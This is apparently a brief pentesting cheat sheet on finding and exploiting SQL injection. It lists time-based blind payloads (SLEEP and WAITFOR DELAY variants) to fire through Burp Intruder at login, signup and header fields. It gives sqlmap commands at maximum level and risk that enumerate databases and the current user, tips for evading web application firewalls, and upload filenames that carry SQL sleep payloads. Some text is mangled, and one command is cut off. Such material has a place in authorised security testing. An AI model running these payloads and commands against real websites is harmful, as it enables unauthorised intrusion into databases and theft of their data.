SQL Injection

How to find SQL injection vulnerability?
1) Logical Operation
One of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if the
GET parameter ?username=Slacker returns the same content as ?username=Slacker’ or ?username=Slacker+’1’=’1 then, you found a SQL
injection.
2) Time Based SQL Injection
Most relative place for inject SQL payloads as [POST Request] are in Login page (username parameter), Forget password page (username
parameter), Singup Page (firstname and last name)
Payloads: orwa’ AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)– (SlEeP%09(14-(5-2))) ‘)) or sleep(5)=’ ‘ WAITFOR
DELAY ‘0:0:5’– ;waitfor delay ‘0:0:5’– );waitfor delay ‘0:0:5’– ‘;waitfor delay ‘0:0:5’– “;waitfor delay
‘0:0:5’– ‘);waitfor delay ‘0:0:5’– “);waitfor delay ‘0:0:5’– ));waitfor delay ‘0:0:5’–
0″XOR(if(now()=sysdate(),sleep(12),0))XOR”Z 0″XOR(if(now()=sysdate(),sleep(12),0))XOR”Z%20=%3E
0’XOR(if(now()=sysdate(),sleep(3),0))XOR’Z
image
How To Test?
1) Use this wordlist with intruder and inject all payloads in relative parameters and headers(User-Agent, Cookies, Referer, x-requested-with and …)
2) After you got DELAY, save request in txt file and use sqlmap for confirm and exploit vulnerability
sqlmap -r request.txt -p parameter-name –force-ssl –level 5 –risk 3 –dbs –hostname –current-user
sqlmap -r txt -p user –force-ssl –level 5 –risk 3
sqlmap -r request.txt -p email/username –force-ssl -level 5 –risk 3 –dbms=”MySQL” –test-filter=”MySQL >= 5.0.12 AND
Sometimes you cant exploits because most modern web apps use WAF & user input validation before execute it so you can try with: – change
request form POST to GET or in reverse – Use –random-agent
time-based blind (query SLEEP)”
3) File Uploaders SQLi
Save file with this names and upload it in site –sleep(15).png –sleep(63).png –sleep(25).png –sleep(57).png
pic.png;waitfor delay ‘0:0:5’–